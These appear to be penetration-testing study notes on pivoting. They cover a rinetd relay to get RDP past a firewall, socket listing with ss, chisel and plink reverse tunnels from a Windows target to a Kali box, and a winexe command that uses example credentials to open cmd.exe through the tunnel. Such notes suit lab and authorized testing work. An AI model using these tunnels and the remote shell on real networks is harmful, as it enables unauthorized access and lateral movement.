Main Concept: Accept traffic on a given IP and then redirect to another IP, PORT
Scenario
A windows box wants to connect to an external device using RDP but due to the firewall restrictions it cannot.
We can set up a proxy on Linux box to bypass this:
vi /etc/rinetd.conf
(ADD) bindaddress bindport connectaddress connectport
local/public IP on kali (208.88.127.99) 80 External IP we want to connect 3389
/etc/init.d/rinetd restart
# Connect from windows to the external IP using RDP with 208.88.127.99:80
Investigate sockets running on the target
ss -tulpn
-t: Display TCP sockets
-u: Display UDP sockets
-l: Displays only listening sockets
-p: Shows the process using the socket
-n: Doesn't resolve service names
Chisel
### On Windows Target ###
chisel_windows.exe client KALI_IP_BOX:9002 R:14147:localhost:14147
### On Kali ###
./chisel_linux server --reverse --port 9002
plink
On Target:
.\plink.exe root@KALI_IP -R 445:127.0.0.1:445
On Kali:
winexe -U ‘admin%password123’ //127.0.0.1 cmd.exe